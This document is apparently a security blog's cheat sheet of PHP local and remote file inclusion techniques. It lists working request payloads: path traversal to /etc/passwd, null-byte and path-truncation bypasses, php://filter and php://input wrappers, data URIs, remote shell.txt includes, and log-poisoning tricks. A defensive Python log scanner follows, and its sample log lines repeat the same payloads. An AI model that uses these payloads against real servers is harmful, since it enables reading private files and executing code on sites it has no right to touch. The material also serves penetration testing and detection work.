Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like to have them summed up in one place.
Basic Local File Inclusion:
<?php include("inc/" . $_GET['file']); ?>
- Including files in the same directory:
?file=.htaccess
- Path Traversal:
?file=../../../../../../../../../var/lib/locate.db
(this file is very interesting because it lets you search the filesystem for other files)
- Including injected PHP code:
?file=../../../../../../../../../var/log/apache/error.log
- Tricks:
  - list of possible Apache dirs
  - include access log from file descriptor /proc/self/fd/XX
  - include more info from the proc file system
  - include email log files
  - include ssh auth.log
  - abuse avatar/image/attachment file uploads
  - include session files
  - include PHP's temporarily uploaded files
  - If you additionally have a phpinfo() output, read here.
Limited Local File Inclusion:
<?php include("inc/" . $_GET['file'] . ".htm"); ?>
- Null Byte Injection:
?file=../../../../../../../../../etc/passwd%00
(requires magic_quotes_gpc=off)
- Directory Listing with Null Byte Injection:
?file=../../../../../../../../../var/www/accounts/%00
(UFS filesystem only, requires magic_quotes_gpc=off, more details here)
- Path Truncation:
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
(more details here and here)
- Dot Truncation:
?file=../../../../../../../../../etc/passwd……………. …
(Windows only, more details here)
- Reverse Path Truncation:
?file=../../../../ […] ../../../../../etc/passwd
(more details here)
Basic Remote File Inclusion:
<?php include($_GET['file']); ?>
- Including Remote Code:
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(requires allow_url_fopen=On and allow_url_include=On)
- Using PHP stream php://input:
?file=php://input
(specify your payload in the POST parameters, watch the URL encoding, details here, requires allow_url_include=On)
- Using PHP stream php://filter:
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because the base64-encoded output won't get evaluated. More details here and here)
- Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(requires allow_url_include=On)
- Using XSS:
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or if only whitelisted domains are allowed)
Limited Remote File Inclusion:
<?php include($_GET['file'] . ".htm"); ?>
- ?file=https://websec.wordpress.com/shell
- ?file=https://websec.wordpress.com/shell.txt?
- ?file=https://websec.wordpress.com/shell.txt%23
(requires allow_url_fopen=On and allow_url_include=On)
- ?file=\\evilshare\shell.php
(bypasses allow_url_fopen=Off)
Static Remote File Inclusion:
<?php include("http://192.168.1.10/config.php"); ?>
- Man In The Middle
(lame indeed, but often forgotten)
Filter evasion:
- Access files with wildcards (read more here)
Of course you can combine all the tricks. If you are aware of any other tricks or interesting files to include, please leave a comment and I'll add them.
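From the defender's side, the payload families listed above share a handful of recognisable shapes in the include parameter. The following Python is an added example (not code from the original post) that percent-decodes the `?file=` value out of Apache access-log lines and labels it with the technique families from this overview; the log lines, client IPs, the `file` parameter name and the repeated-decoding heuristic are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache access-log lines (not from the original post); the request
# line carries the ?file= parameter the post's examples abuse.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?file=about.htm HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?file=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1902
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=http://203.0.113.9/shell.txt HTTP/1.1" 200 77
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= HTTP/1.1" 200 12
10.0.0.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?file=\\evilshare\shell.php HTTP/1.1" 200 33
10.0.0.11 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?file=%252e%252e%252f%252e%252e%252fproc%252fself%252ffd%252f12 HTTP/1.1" 200 0
"""

# One entry per technique family in the post; patterns run on the percent-decoded value.
SIGNATURES = [
    ("path traversal",  re.compile(r"\.\.[/\\]")),
    ("null byte",       re.compile(r"\x00")),
    ("path truncation", re.compile(r"(?:\.\\){4,}|\.{8,}")),
    ("proc filesystem", re.compile(r"/proc/self/")),
    ("php wrapper",     re.compile(r"^php://", re.I)),
    ("data URI",        re.compile(r"^data:", re.I)),
    ("remote URL",      re.compile(r"^(?:https?|ftp)://", re.I)),
    ("UNC share",       re.compile(r"^\\\\")),
]
REQ_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"', re.M)

def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so double encoding cannot hide ../ or %00."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value: str) -> list[str]:
    """Names of every technique family from the post that the decoded include value matches."""
    return [name for name, rx in SIGNATURES if rx.search(decode_param(value))]

def scan_log(text: str, param: str = "file") -> list[tuple[str, list[str]]]:
    """(client IP, findings) for every request whose include parameter looks hostile."""
    findings = []
    for m in REQ_LINE.finditer(text):
        for pair in urlsplit(m.group("target")).query.split("&"):
            name, _, value = pair.partition("=")
            if name == param and (hits := classify(value)):
                findings.append((m.group("ip"), hits))
    return findings
```

Benign requests such as `?file=about.htm` produce no finding, while the double-encoded entry is only caught because the value is decoded until it stops changing.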